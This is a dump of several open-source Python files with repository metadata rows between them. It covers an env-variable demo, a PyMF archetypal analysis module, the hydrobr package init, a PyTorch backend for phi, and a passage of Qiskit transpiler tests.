print(env['FOO', dict]) # => {} # TODO: {0: 'foo', 1: 'bar', 2: 'baz', 3: 1, 4: 2, 5: 3}
print('---')
env['FOO'] = ['foo', 'bar', 'baz', 1, 2, 3]
print(env['FOO']) # => '[foo,bar,baz,1,2,3]'
print(env['FOO', bool]) # => True
print(env['FOO', int]) # => 123
print(env['FOO', float]) # => 123.0
print(env['FOO', str]) # => '[foo, bar, baz, 1, 2, 3]'
print(env['FOO', tuple]) # => ('foo', 'bar', 'baz', 1, 2, 3)
print(env['FOO', list]) # => ['foo', 'bar', 'baz', 1, 2, 3]
print(env['FOO', dict]) # => {} # TODO: {0: 'foo', 1: 'bar', 2: 'baz', 3: 1, 4: 2, 5: 3}
print('---')
env['FOO'] = {'foo': 1, 'bar': 2, 'baz': 3}
print(env['FOO']) # => '{foo:1,bar:2,baz:3}' # REVIEW: handle nested json
print(env['FOO', bool]) # => True
print(env['FOO', int]) # => 123
print(env['FOO', float]) # => 123.0
print(env['FOO', str]) # => '{foo: 1, bar: 2, baz: 3}'
print(env['FOO', tuple]) # => ({0: 'foo', 1: 'bar', 2: 'baz', 3: 1, 4: 2, 5: 3})
print(env['FOO', list]) # => [{0: 'foo', 1: 'bar', 2: 'baz', 3: 1, 4: 2, 5: 3}]
print(env['FOO', dict]) # => {'foo': 1, 'bar': 2, 'baz': 3}
# etc.
print('---')
env.inspect()
print('---')
env.print()
print('---')
| 23.885417 | 89 | 0.490188 |
9b4e9bca9ed86f17e168c1870733f3c9e6cd62fb | 4,743 | py | Python | msaf/pymf/aa.py | m-tian/msaf-copy | 614bba6686fd0abf3c5866b92d78fccf5186b6a3 | [
"MIT"
] | 1 | 2020-02-17T08:14:16.000Z | 2020-02-17T08:14:16.000Z | msaf/pymf/aa.py | m-tian/msaf-copy | 614bba6686fd0abf3c5866b92d78fccf5186b6a3 | [
"MIT"
] | null | null | null | msaf/pymf/aa.py | m-tian/msaf-copy | 614bba6686fd0abf3c5866b92d78fccf5186b6a3 | [
"MIT"
] | 1 | 2020-02-14T08:57:35.000Z | 2020-02-14T08:57:35.000Z | #!/usr/bin/python
#
# Copyright (C) Christian Thurau, 2010.
# Licensed under the GNU General Public License (GPL).
# http://www.gnu.org/licenses/gpl.txt
"""
PyMF Archetypal Analysis [1]
AA: class for Archetypal Analysis
[1] Cutler, A. Breiman, L. (1994), "Archetypal Analysis", Technometrics 36(4),
338-347.
"""
import numpy as np
from dist import vq
from cvxopt import solvers, base
from svd import pinv
from nmf import NMF
__all__ = ["AA"]
class AA(NMF):
"""
AA(data, num_bases=4)
Archetypal Analysis. Factorize a data matrix into two matrices s.t.
F = | data - W*H | = | data - data*beta*H| is minimal. H and beta
are restricted to convexity (beta >=0, sum(beta, axis=1) = [1 .. 1]).
Factorization is solved via an alternating least squares optimization
using the quadratic programming solver from cvxopt.
Parameters
----------
data : array_like, shape (_data_dimension, _num_samples)
the input data
num_bases: int, optional
Number of bases to compute (column rank of W and row rank of H).
4 (default)
Attributes
----------
W : "data_dimension x num_bases" matrix of basis vectors
H : "num bases x num_samples" matrix of coefficients
beta : "num_bases x num_samples" matrix of basis vector coefficients
(for constructing W s.t. W = beta * data.T )
ferr : frobenius norm (after calling .factorize())
Example
-------
Applying AA to some rather stupid data set:
>>> import numpy as np
>>> from aa import AA
>>> data = np.array([[1.0, 0.0, 2.0], [0.0, 1.0, 1.0]])
Use 2 basis vectors -> W shape(data_dimension, 2).
>>> aa_mdl = AA(data, num_bases=2)
Set number of iterations to 5 and start computing the factorization.
>>> aa_mdl.factorize(niter=5)
The basis vectors are now stored in aa_mdl.W, the coefficients in aa_mdl.H.
To compute coefficients for an existing set of basis vectors simply copy W
to aa_mdl.W, and set compute_w to False:
>>> data = np.array([[1.5], [1.2]])
>>> W = np.array([[1.0, 0.0], [0.0, 1.0]])
>>> aa_mdl = AA(data, num_bases=2)
>>> aa_mdl.W = W
>>> aa_mdl.factorize(niter=5, compute_w=False)
The result is a set of coefficients aa_mdl.H, s.t. data = W * aa_mdl.H.
"""
# set cvxopt options
solvers.options['show_progress'] = False
def init_h(self):
self.H = np.random.random((self._num_bases, self._num_samples))
self.H /= self.H.sum(axis=0)
def init_w(self):
self.beta = np.random.random((self._num_bases, self._num_samples))
self.beta /= self.beta.sum(axis=0)
self.W = np.dot(self.beta, self.data.T).T
self.W = np.random.random((self._data_dimension, self._num_bases))
def update_h(self):
""" alternating least squares step, update H under the convexity
constraint """
def update_single_h(i):
""" compute single H[:,i] """
# optimize alpha using qp solver from cvxopt
FA = base.matrix(np.float64(np.dot(-self.W.T, self.data[:,i])))
al = solvers.qp(HA, FA, INQa, INQb, EQa, EQb)
self.H[:,i] = np.array(al['x']).reshape((1, self._num_bases))
EQb = base.matrix(1.0, (1,1))
# float64 required for cvxopt
HA = base.matrix(np.float64(np.dot(self.W.T, self.W)))
INQa = base.matrix(-np.eye(self._num_bases))
INQb = base.matrix(0.0, (self._num_bases,1))
EQa = base.matrix(1.0, (1, self._num_bases))
for i in xrange(self._num_samples):
update_single_h(i)
def update_w(self):
""" alternating least squares step, update W under the convexity
constraint """
def update_single_w(i):
""" compute single W[:,i] """
# optimize beta using qp solver from cvxopt
FB = base.matrix(np.float64(np.dot(-self.data.T, W_hat[:,i])))
be = solvers.qp(HB, FB, INQa, INQb, EQa, EQb)
self.beta[i,:] = np.array(be['x']).reshape((1, self._num_samples))
# float64 required for cvxopt
HB = base.matrix(np.float64(np.dot(self.data[:,:].T, self.data[:,:])))
EQb = base.matrix(1.0, (1, 1))
W_hat = np.dot(self.data, pinv(self.H))
INQa = base.matrix(-np.eye(self._num_samples))
INQb = base.matrix(0.0, (self._num_samples, 1))
EQa = base.matrix(1.0, (1, self._num_samples))
for i in xrange(self._num_bases):
update_single_w(i)
self.W = np.dot(self.beta, self.data.T).T
if __name__ == "__main__":
import doctest
doctest.testmod()
| 34.122302 | 82 | 0.596669 |
7f8d4e4c6a7a1ab2094cebef82e0846148a1419d | 263 | py | Python | hydrobr/__init__.py | wallissoncarvalho/hydrobr | 0374d6352a2d361486d41c6713059ddc4bdd30db | [
"BSD-3-Clause"
] | 17 | 2020-07-02T23:28:24.000Z | 2021-03-10T12:25:01.000Z | hydrobr/__init__.py | LucasAgro/hydrobr | f84cf02998ab3db693d925e4c6f89b274595b117 | [
"BSD-3-Clause"
] | 8 | 2020-07-07T14:12:45.000Z | 2020-07-07T20:03:11.000Z | hydrobr/__init__.py | LucasAgro/hydrobr | f84cf02998ab3db693d925e4c6f89b274595b117 | [
"BSD-3-Clause"
] | 4 | 2021-04-29T15:39:19.000Z | 2021-10-29T18:30:50.000Z | """HydroBr is an open-source package to work with Brazilian hydrometeorological time series."""
__version__ = '0.1.1'
from hydrobr import get_data
from hydrobr.graphics import Plot
from hydrobr.preprocessing import PreProcessing
from hydrobr.save import SaveAs
| 29.222222 | 95 | 0.813688 |
f2b753c22e58acc6a9534dc7151218f5f66bc851 | 11,678 | py | Python | phi/torch/torch_backend.py | tum-pbs/CG-Solver-in-the-Loop | f6cb28819c7559d4afa972abc02f810c0c81515f | [
"MIT"
] | 13 | 2020-12-05T13:40:59.000Z | 2021-12-26T09:58:59.000Z | phi/torch/torch_backend.py | tum-pbs/CG-Solver-in-the-Loop | f6cb28819c7559d4afa972abc02f810c0c81515f | [
"MIT"
] | null | null | null | phi/torch/torch_backend.py | tum-pbs/CG-Solver-in-the-Loop | f6cb28819c7559d4afa972abc02f810c0c81515f | [
"MIT"
] | null | null | null | import warnings
import numpy as np
import torch
import torch.nn.functional as torchf
from phi.backend.backend import Backend
class TorchBackend(Backend):
def __init__(self):
Backend.__init__(self, 'PyTorch')
def is_tensor(self, x):
return isinstance(x, (torch.Tensor, ComplexTensor))
def as_tensor(self, x):
if self.is_tensor(x):
return x
if isinstance(x, np.ndarray):
if x.dtype == np.float64:
x = x.astype(np.float32)
return torch.from_numpy(x)
if isinstance(x, (tuple, list)):
try:
return torch.tensor(x)
except ValueError: # there may be Tensors inside the list
components = [self.as_tensor(c) for c in x]
return torch.stack(components, dim=0)
return torch.tensor(x)
def copy(self, tensor, only_mutable=False):
return torch.clone(tensor)
def equal(self, x, y):
return x == y
def random_uniform(self, shape):
return torch.rand(shape)
def stack(self, values, axis=0):
return torch.stack(values, dim=axis)
def concat(self, values, axis):
return torch.cat(values, dim=axis)
def pad(self, value, pad_width, mode='constant', constant_values=0):
mode = mode.lower()
if mode == 'wrap':
warnings.warn("'wrap' is deprecated, use 'circular' instead", DeprecationWarning, stacklevel=2)
mode = 'circular'
if mode == 'constant':
pad = sum(pad_width[::-1], [] if isinstance(pad_width, list) else ())
return torchf.pad(value, pad, mode=mode, value=constant_values) # constant, reflect, replicate, circular
if mode == 'symmetric':
warnings.warn("mode 'symmetric' is not supported by PyTorch. Defaults to 'replicate'.")
mode = 'replicate'
value = channels_first(value)
reversed_axis_pad = pad_width[1:-1][::-1]
pad = sum(reversed_axis_pad, [] if isinstance(pad_width, list) else ())
result = torchf.pad(value, pad, mode=mode, value=constant_values) # constant, reflect, replicate, circular
result = channels_last(result)
return result
def reshape(self, value, shape):
return torch.reshape(value, shape)
def sum(self, value, axis=None, keepdims=False):
value = self.as_tensor(value)
if axis is None:
axis = range(len(value.shape))
return torch.sum(value, dim=axis, keepdim=keepdims)
def prod(self, value, axis=None):
return torch.prod(value, dim=axis)
def divide_no_nan(self, x, y):
result = self.as_tensor(x) / self.as_tensor(y)
return torch.where(y == 0, torch.zeros_like(result), result)
def where(self, condition, x=None, y=None):
return torch.where(condition, x, y)
def mean(self, value, axis=None, keepdims=False):
return torch.mean(value, dim=axis, keepdim=keepdims)
def py_func(self, func, inputs, Tout, shape_out, stateful=True, name=None, grad=None):
raise NotImplementedError()
def resample(self, inputs, sample_coords, interpolation='linear', boundary='constant'):
inputs = channels_first(self.as_tensor(inputs))
sample_coords = self.as_tensor(sample_coords)
# --- Interpolation ---
if interpolation.lower() == 'linear':
interpolation = 'bilinear'
elif interpolation.lower() == 'nearest':
interpolation = 'nearest'
else:
raise NotImplementedError(interpolation)
# --- Boundary ---
if boundary == 'zero' or boundary == 'constant':
boundary = 'zeros'
elif boundary == 'replicate':
boundary = 'border'
elif boundary == 'circular':
shape = self.to_float(inputs.shape[2:])
sample_coords = torch.fmod(sample_coords, shape)
inputs = torchf.pad(inputs, [0, 1] * (len(inputs.shape)-2), mode='circular')
boundary = 'zeros'
else:
raise NotImplementedError(boundary)
resolution = torch.Tensor(self.staticshape(inputs)[2:])
sample_coords = 2 * sample_coords / (resolution-1) - 1
sample_coords = torch.flip(sample_coords, dims=[-1])
result = torchf.grid_sample(inputs, sample_coords, mode=interpolation, padding_mode=boundary) # can cause segmentation violation if NaN or inf are present
result = channels_last(result)
return result
def range(self, start, limit=None, delta=1, dtype=None):
raise NotImplementedError()
def zeros_like(self, tensor):
return torch.zeros_like(tensor)
def ones_like(self, tensor):
return torch.ones_like(tensor)
def dot(self, a, b, axes):
raise NotImplementedError()
def matmul(self, A, b):
if isinstance(A, torch.sparse.FloatTensor):
result = torch.sparse.mm(A, torch.transpose(b, 0, 1))
return torch.transpose(result, 0, 1)
raise NotImplementedError()
def while_loop(self, cond, body, loop_vars, shape_invariants=None, parallel_iterations=10, back_prop=True, swap_memory=False, name=None, maximum_iterations=None):
i = 0
while cond(*loop_vars):
if maximum_iterations is not None and i == maximum_iterations: break
loop_vars = body(*loop_vars)
i += 1
return loop_vars
def abs(self, x):
return torch.abs(x)
def sign(self, x):
return torch.sign(x)
def round(self, x):
return torch.round(x)
def ceil(self, x):
return torch.ceil(x)
def floor(self, x):
return torch.floor(x)
def max(self, x, axis=None):
if axis is None:
return torch.max(x)
return torch.max(x, dim=axis)
def min(self, x, axis=None):
if axis is None:
return torch.min(x)
return torch.min(x, dim=axis)
def maximum(self, a, b):
b = self.as_tensor(b)
return torch.max(a, other=b)
def minimum(self, a, b):
return torch.min(a, other=b)
def with_custom_gradient(self, function, inputs, gradient, input_index=0, output_index=None, name_base='custom_gradient_func'):
return function(*inputs) # ToDo
def sqrt(self, x):
return torch.sqrt(x)
def exp(self, x):
return torch.exp(x)
def conv(self, tensor, kernel, padding='same'):
tensor = self.as_tensor(tensor)
kernel = self.as_tensor(kernel)
if padding.lower() == 'valid':
padding = 0
elif padding.lower() == 'same':
shape = kernel.shape
padding = sum([[d//2, (d+1)//2] for d in shape], [])
else:
raise ValueError(padding)
tensor = channels_first(tensor)
kernel = kernel.permute((-2, -1) + tuple(range(len(kernel.shape)-2)))
convf = {3: torchf.conv1d, 4: torchf.conv2d, 5: torchf.conv3d}[len(tensor.shape)]
result = convf(tensor, kernel, padding=padding)
result = channels_last(result)
return result
def expand_dims(self, a, axis=0, number=1):
for _ in range(number):
a = torch.unsqueeze(a, dim=axis)
return a
def shape(self, tensor):
return tensor.shape
def staticshape(self, tensor):
return tuple(tensor.shape)
def to_float(self, x):
x = self.as_tensor(x)
return x.float()
def to_int(self, x, int64=False):
x = self.as_tensor(x)
return x.int()
def to_complex(self, x):
x = self.as_tensor(x)
return ComplexTensor(self.stack([x, torch.zeros_like(x)], -1))
def gather(self, values, indices):
raise NotImplementedError()
def gather_nd(self, values, indices):
raise NotImplementedError()
def unstack(self, tensor, axis=0, keepdims=False):
unstacked = torch.unbind(tensor, dim=axis)
if keepdims:
unstacked = [self.expand_dims(c, axis=axis) for c in unstacked]
return unstacked
def std(self, x, axis=None, keepdims=False):
raise NotImplementedError()
def boolean_mask(self, x, mask):
raise NotImplementedError()
def isfinite(self, x):
raise NotImplementedError()
def scatter(self, points, indices, values, shape, duplicates_handling='undefined'):
raise NotImplementedError()
def any(self, boolean_tensor, axis=None, keepdims=False):
raise NotImplementedError()
def all(self, boolean_tensor, axis=None, keepdims=False):
raise NotImplementedError()
def fft(self, x):
if not isinstance(x, ComplexTensor):
x = self.to_complex(x)
rank = len(x.shape) - 2
x = channels_first(x).tensor
k = torch.fft(x, rank)
k = ComplexTensor(k)
k = channels_last(k)
return k
def ifft(self, k):
if not isinstance(k, ComplexTensor):
k = self.to_complex(k)
rank = len(k.shape) - 2
k = channels_first(k)
x = torch.ifft(k.tensor, rank)
x = ComplexTensor(x)
x = channels_last(x)
return x
def imag(self, complex):
if isinstance(complex, ComplexTensor):
return complex.imag
else:
if isinstance(complex, np.ndarray):
complex = np.imag(complex)
return torch.zeros_like(self.as_tensor(complex))
def real(self, complex):
if isinstance(complex, ComplexTensor):
return complex.real
else:
if isinstance(complex, np.ndarray):
complex = np.real(complex)
return self.as_tensor(complex)
def cast(self, x, dtype):
if dtype == np.float32:
return self.to_float(x)
if dtype == np.int32:
return self.to_int(x)
if dtype == np.int64:
return self.to_int(x, int64=True)
if dtype == np.complex64:
return self.to_complex(x)
raise NotImplementedError()
def sin(self, x):
return torch.sin(x)
def cos(self, x):
return torch.cos(x)
def dtype(self, array):
return array.dtype
def tile(self, value, multiples):
raise NotImplementedError()
def sparse_tensor(self, indices, values, shape):
indices_ = torch.transpose(torch.LongTensor(indices), 0, 1)
values_ = torch.FloatTensor(values)
return torch.sparse.FloatTensor(indices_, values_, shape)
def channels_first(x):
if isinstance(x, ComplexTensor):
x = x.tensor
y = x.permute(*((0, -2) + tuple(range(1, len(x.shape) - 2)) + (-1,)))
return ComplexTensor(y)
else:
return x.permute(*((0, -1) + tuple(range(1, len(x.shape) - 1))))
def channels_last(x):
if isinstance(x, ComplexTensor):
x = x.tensor
x = x.permute((0,) + tuple(range(2, len(x.shape)-1)) + (1, -1))
return ComplexTensor(x)
else:
return x.permute((0,) + tuple(range(2, len(x.shape))) + (1,))
class ComplexTensor(object):
def __init__(self, tensor):
self.tensor = tensor
@property
def shape(self):
return self.tensor.shape[:-1]
@property
def real(self):
return self.tensor[...,0]
@property
def imag(self):
return self.tensor[...,1]
def __mul__(self, other):
math = TorchBackend()
real = self.real * math.real(other) - self.imag * math.imag(other)
imag = self.real * math.imag(other) + self.imag * math.real(other)
result = math.stack([real, imag], -1)
return ComplexTensor(result)
| 32.082418 | 166 | 0.599161 |
19c7f273191b9e1286d007807759d42f42b87daa | 42,109 | py | Python | test/python/compiler/test_transpiler.py | georgios-ts/qiskit-terra | 44e0a7ae967be2a95808f47b42ddef26704fc5b7 | [
"Apache-2.0"
] | null | null | null | test/python/compiler/test_transpiler.py | georgios-ts/qiskit-terra | 44e0a7ae967be2a95808f47b42ddef26704fc5b7 | [
"Apache-2.0"
] | 2 | 2020-02-20T19:44:42.000Z | 2020-09-25T20:34:17.000Z | test/python/compiler/test_transpiler.py | georgios-ts/qiskit-terra | 44e0a7ae967be2a95808f47b42ddef26704fc5b7 | [
"Apache-2.0"
] | null | null | null | # This code is part of Qiskit.
#
# (C) Copyright IBM 2017, 2019.
#
# This code is licensed under the Apache License, Version 2.0. You may
# obtain a copy of this license in the LICENSE.txt file in the root directory
# of this source tree or at http://www.apache.org/licenses/LICENSE-2.0.
#
# Any modifications or derivative works of this code must retain this
# copyright notice, and modified files need to carry a notice indicating
# that they have been altered from the originals.
# pylint: disable=no-member
"""Tests basic functionality of the transpile function"""
import io
import sys
import math
from logging import StreamHandler, getLogger
from unittest.mock import patch
from ddt import ddt, data, unpack
from test import combine # pylint: disable=wrong-import-order
import numpy as np
from qiskit.exceptions import QiskitError
from qiskit import BasicAer
from qiskit import QuantumRegister, ClassicalRegister, QuantumCircuit, pulse
from qiskit.circuit import Parameter, Gate
from qiskit.compiler import transpile
from qiskit.converters import circuit_to_dag
from qiskit.circuit.library import CXGate, U3Gate, U2Gate, U1Gate, RXGate, RYGate
from qiskit.test import QiskitTestCase, Path
from qiskit.test.mock import FakeMelbourne, FakeRueschlikon, FakeAlmaden
from qiskit.transpiler import Layout, CouplingMap
from qiskit.transpiler import PassManager
from qiskit.transpiler.exceptions import TranspilerError
from qiskit.transpiler.passes import BarrierBeforeFinalMeasurements, CXDirection
from qiskit.quantum_info import Operator
from qiskit.transpiler.passmanager_config import PassManagerConfig
from qiskit.transpiler.preset_passmanagers import level_0_pass_manager
@ddt
class TestTranspile(QiskitTestCase):
"""Test transpile function."""
def test_pass_manager_none(self):
"""Test passing the default (None) pass manager to the transpiler.
It should perform the default qiskit flow:
unroll, swap_mapper, cx_direction, cx_cancellation, optimize_1q_gates
and should be equivalent to using tools.compile
"""
qr = QuantumRegister(2, 'qr')
circuit = QuantumCircuit(qr)
circuit.h(qr[0])
circuit.h(qr[0])
circuit.cx(qr[0], qr[1])
circuit.cx(qr[1], qr[0])
circuit.cx(qr[0], qr[1])
circuit.cx(qr[1], qr[0])
coupling_map = [[1, 0]]
basis_gates = ['u1', 'u2', 'u3', 'cx', 'id']
backend = BasicAer.get_backend('qasm_simulator')
circuit2 = transpile(circuit, backend=backend, coupling_map=coupling_map,
basis_gates=basis_gates, pass_manager=None)
circuit3 = transpile(circuit, backend=backend, coupling_map=coupling_map,
basis_gates=basis_gates)
self.assertEqual(circuit2, circuit3)
def test_transpile_basis_gates_no_backend_no_coupling_map(self):
"""Verify transpile() works with no coupling_map or backend."""
qr = QuantumRegister(2, 'qr')
circuit = QuantumCircuit(qr)
circuit.h(qr[0])
circuit.h(qr[0])
circuit.cx(qr[0], qr[1])
circuit.cx(qr[0], qr[1])
circuit.cx(qr[0], qr[1])
circuit.cx(qr[0], qr[1])
basis_gates = ['u1', 'u2', 'u3', 'cx', 'id']
circuit2 = transpile(circuit, basis_gates=basis_gates, optimization_level=0)
resources_after = circuit2.count_ops()
self.assertEqual({'u2': 2, 'cx': 4}, resources_after)
def test_transpile_non_adjacent_layout(self):
"""Transpile pipeline can handle manual layout on non-adjacent qubits.
circuit:
qr0:-[H]--.------------ -> 1
|
qr1:-----(+)--.-------- -> 2
|
qr2:---------(+)--.---- -> 3
|
qr3:-------------(+)--- -> 5
device:
0 - 1 - 2 - 3 - 4 - 5 - 6
| | | | | |
13 - 12 - 11 - 10 - 9 - 8 - 7
"""
qr = QuantumRegister(4, 'qr')
circuit = QuantumCircuit(qr)
circuit.h(qr[0])
circuit.cx(qr[0], qr[1])
circuit.cx(qr[1], qr[2])
circuit.cx(qr[2], qr[3])
coupling_map = FakeMelbourne().configuration().coupling_map
basis_gates = FakeMelbourne().configuration().basis_gates
initial_layout = [None, qr[0], qr[1], qr[2], None, qr[3]]
new_circuit = transpile(circuit,
basis_gates=basis_gates,
coupling_map=coupling_map,
initial_layout=initial_layout)
for gate, qargs, _ in new_circuit.data:
if isinstance(gate, CXGate):
self.assertIn([x.index for x in qargs], coupling_map)
def test_transpile_qft_grid(self):
"""Transpile pipeline can handle 8-qubit QFT on 14-qubit grid.
"""
qr = QuantumRegister(8)
circuit = QuantumCircuit(qr)
for i, _ in enumerate(qr):
for j in range(i):
circuit.cp(math.pi / float(2 ** (i - j)), qr[i], qr[j])
circuit.h(qr[i])
coupling_map = FakeMelbourne().configuration().coupling_map
basis_gates = FakeMelbourne().configuration().basis_gates
new_circuit = transpile(circuit,
basis_gates=basis_gates,
coupling_map=coupling_map)
for gate, qargs, _ in new_circuit.data:
if isinstance(gate, CXGate):
self.assertIn([x.index for x in qargs], coupling_map)
def test_already_mapped_1(self):
"""Circuit not remapped if matches topology.
See: https://github.com/Qiskit/qiskit-terra/issues/342
"""
backend = FakeRueschlikon()
coupling_map = backend.configuration().coupling_map
basis_gates = backend.configuration().basis_gates
qr = QuantumRegister(16, 'qr')
cr = ClassicalRegister(16, 'cr')
qc = QuantumCircuit(qr, cr)
qc.cx(qr[3], qr[14])
qc.cx(qr[5], qr[4])
qc.h(qr[9])
qc.cx(qr[9], qr[8])
qc.x(qr[11])
qc.cx(qr[3], qr[4])
qc.cx(qr[12], qr[11])
qc.cx(qr[13], qr[4])
qc.measure(qr, cr)
new_qc = transpile(qc, coupling_map=coupling_map, basis_gates=basis_gates,
initial_layout=Layout.generate_trivial_layout(qr))
cx_qubits = [qargs for (gate, qargs, _) in new_qc.data if gate.name == "cx"]
cx_qubits_physical = [[ctrl.index, tgt.index] for [ctrl, tgt] in cx_qubits]
self.assertEqual(sorted(cx_qubits_physical),
[[3, 4], [3, 14], [5, 4], [9, 8], [12, 11], [13, 4]])
def test_already_mapped_via_layout(self):
"""Test that a manual layout that satisfies a coupling map does not get altered.
See: https://github.com/Qiskit/qiskit-terra/issues/2036
"""
basis_gates = ['u1', 'u2', 'u3', 'cx', 'id']
coupling_map = [[0, 1], [0, 5], [1, 0], [1, 2], [2, 1], [2, 3],
[3, 2], [3, 4], [4, 3], [4, 9], [5, 0], [5, 6],
[5, 10], [6, 5], [6, 7], [7, 6], [7, 8], [7, 12],
[8, 7], [8, 9], [9, 4], [9, 8], [9, 14], [10, 5],
[10, 11], [10, 15], [11, 10], [11, 12], [12, 7],
[12, 11], [12, 13], [13, 12], [13, 14], [14, 9],
[14, 13], [14, 19], [15, 10], [15, 16], [16, 15],
[16, 17], [17, 16], [17, 18], [18, 17], [18, 19],
[19, 14], [19, 18]]
q = QuantumRegister(6, name='qn')
c = ClassicalRegister(2, name='cn')
qc = QuantumCircuit(q, c)
qc.h(q[0])
qc.h(q[5])
qc.cx(q[0], q[5])
qc.p(2, q[5])
qc.cx(q[0], q[5])
qc.h(q[0])
qc.h(q[5])
qc.barrier(q)
qc.measure(q[0], c[0])
qc.measure(q[5], c[1])
initial_layout = [q[3], q[4], None, None, q[5], q[2], q[1], None, None, q[0],
None, None, None, None, None, None, None, None, None, None]
new_qc = transpile(qc, coupling_map=coupling_map,
basis_gates=basis_gates, initial_layout=initial_layout)
cx_qubits = [qargs for (gate, qargs, _) in new_qc.data
if gate.name == "cx"]
cx_qubits_physical = [[ctrl.index, tgt.index] for [ctrl, tgt] in cx_qubits]
self.assertEqual(sorted(cx_qubits_physical),
[[9, 4], [9, 4]])
def test_transpile_bell(self):
"""Test Transpile Bell.
If all correct some should exists.
"""
backend = BasicAer.get_backend('qasm_simulator')
qubit_reg = QuantumRegister(2, name='q')
clbit_reg = ClassicalRegister(2, name='c')
qc = QuantumCircuit(qubit_reg, clbit_reg, name="bell")
qc.h(qubit_reg[0])
qc.cx(qubit_reg[0], qubit_reg[1])
qc.measure(qubit_reg, clbit_reg)
circuits = transpile(qc, backend)
self.assertIsInstance(circuits, QuantumCircuit)
def test_transpile_two(self):
"""Test transpile to circuits.
If all correct some should exists.
"""
backend = BasicAer.get_backend('qasm_simulator')
qubit_reg = QuantumRegister(2)
clbit_reg = ClassicalRegister(2)
qubit_reg2 = QuantumRegister(2)
clbit_reg2 = ClassicalRegister(2)
qc = QuantumCircuit(qubit_reg, clbit_reg, name="bell")
qc.h(qubit_reg[0])
qc.cx(qubit_reg[0], qubit_reg[1])
qc.measure(qubit_reg, clbit_reg)
qc_extra = QuantumCircuit(qubit_reg, qubit_reg2, clbit_reg, clbit_reg2, name="extra")
qc_extra.measure(qubit_reg, clbit_reg)
circuits = transpile([qc, qc_extra], backend)
self.assertIsInstance(circuits[0], QuantumCircuit)
self.assertIsInstance(circuits[1], QuantumCircuit)
def test_transpile_singleton(self):
"""Test transpile a single-element list with a circuit.
See https://github.com/Qiskit/qiskit-terra/issues/5260"""
backend = BasicAer.get_backend('qasm_simulator')
qubit_reg = QuantumRegister(2)
clbit_reg = ClassicalRegister(2)
qc = QuantumCircuit(qubit_reg, clbit_reg, name="bell")
qc.h(qubit_reg[0])
qc.cx(qubit_reg[0], qubit_reg[1])
qc.measure(qubit_reg, clbit_reg)
circuits = transpile([qc], backend)
self.assertEqual(len(circuits), 1)
self.assertIsInstance(circuits[0], QuantumCircuit)
def test_mapping_correction(self):
"""Test mapping works in previous failed case.
"""
backend = FakeRueschlikon()
qr = QuantumRegister(name='qr', size=11)
cr = ClassicalRegister(name='qc', size=11)
circuit = QuantumCircuit(qr, cr)
circuit.u(1.564784764685993, -1.2378965763410095, 2.9746763177861713, qr[3])
circuit.u(1.2269835563676523, 1.1932982847014162, -1.5597357740824318, qr[5])
circuit.cx(qr[5], qr[3])
circuit.p(0.856768317675967, qr[3])
circuit.u(-3.3911273825190915, 0.0, 0.0, qr[5])
circuit.cx(qr[3], qr[5])
circuit.u(2.159209321625547, 0.0, 0.0, qr[5])
circuit.cx(qr[5], qr[3])
circuit.u(0.30949966910232335, 1.1706201763833217, 1.738408691990081, qr[3])
circuit.u(1.9630571407274755, -0.6818742967975088, 1.8336534616728195, qr[5])
circuit.u(1.330181833806101, 0.6003162754946363, -3.181264980452862, qr[7])
circuit.u(0.4885914820775024, 3.133297443244865, -2.794457469189904, qr[8])
circuit.cx(qr[8], qr[7])
circuit.p(2.2196187596178616, qr[7])
circuit.u(-3.152367609631023, 0.0, 0.0, qr[8])
circuit.cx(qr[7], qr[8])
circuit.u(1.2646005789809263, 0.0, 0.0, qr[8])
circuit.cx(qr[8], qr[7])
circuit.u(0.7517780502091939, 1.2828514296564781, 1.6781179605443775, qr[7])
circuit.u(0.9267400575390405, 2.0526277839695153, 2.034202361069533, qr[8])
circuit.u(2.550304293455634, 3.8250017126569698, -2.1351609599720054, qr[1])
circuit.u(0.9566260876600556, -1.1147561503064538, 2.0571590492298797, qr[4])
circuit.cx(qr[4], qr[1])
circuit.p(2.1899329069137394, qr[1])
circuit.u(-1.8371715243173294, 0.0, 0.0, qr[4])
circuit.cx(qr[1], qr[4])
circuit.u(0.4717053496327104, 0.0, 0.0, qr[4])
circuit.cx(qr[4], qr[1])
circuit.u(2.3167620677708145, -1.2337330260253256, -0.5671322899563955, qr[1])
circuit.u(1.0468499525240678, 0.8680750644809365, -1.4083720073192485, qr[4])
circuit.u(2.4204244021892807, -2.211701932616922, 3.8297006565735883, qr[10])
circuit.u(0.36660280497727255, 3.273119149343493, -1.8003362351299388, qr[6])
circuit.cx(qr[6], qr[10])
circuit.p(1.067395863586385, qr[10])
circuit.u(-0.7044917541291232, 0.0, 0.0, qr[6])
circuit.cx(qr[10], qr[6])
circuit.u(2.1830003849921527, 0.0, 0.0, qr[6])
circuit.cx(qr[6], qr[10])
circuit.u(2.1538343756723917, 2.2653381826084606, -3.550087952059485, qr[10])
circuit.u(1.307627685019188, -0.44686656993522567, -2.3238098554327418, qr[6])
circuit.u(2.2046797998462906, 0.9732961754855436, 1.8527865921467421, qr[9])
circuit.u(2.1665254613904126, -1.281337664694577, -1.2424905413631209, qr[0])
circuit.cx(qr[0], qr[9])
circuit.p(2.6209599970201007, qr[9])
circuit.u(0.04680566321901303, 0.0, 0.0, qr[0])
circuit.cx(qr[9], qr[0])
circuit.u(1.7728411151289603, 0.0, 0.0, qr[0])
circuit.cx(qr[0], qr[9])
circuit.u(2.4866395967434443, 0.48684511243566697, -3.0069186877854728, qr[9])
circuit.u(1.7369112924273789, -4.239660866163805, 1.0623389015296005, qr[0])
circuit.barrier(qr)
circuit.measure(qr, cr)
circuits = transpile(circuit, backend)
self.assertIsInstance(circuits, QuantumCircuit)
def test_transpiler_layout_from_intlist(self):
"""A list of ints gives layout to correctly map circuit.
virtual physical
q1_0 - 4 ---[H]---
q2_0 - 5
q2_1 - 6 ---[H]---
q3_0 - 8
q3_1 - 9
q3_2 - 10 ---[H]---
"""
qr1 = QuantumRegister(1, 'qr1')
qr2 = QuantumRegister(2, 'qr2')
qr3 = QuantumRegister(3, 'qr3')
qc = QuantumCircuit(qr1, qr2, qr3)
qc.h(qr1[0])
qc.h(qr2[1])
qc.h(qr3[2])
layout = [4, 5, 6, 8, 9, 10]
cmap = [[1, 0], [1, 2], [2, 3], [4, 3], [4, 10],
[5, 4], [5, 6], [5, 9], [6, 8], [7, 8],
[9, 8], [9, 10], [11, 3], [11, 10],
[11, 12], [12, 2], [13, 1], [13, 12]]
new_circ = transpile(qc, backend=None,
coupling_map=cmap,
basis_gates=['u2'],
initial_layout=layout)
mapped_qubits = []
for _, qargs, _ in new_circ.data:
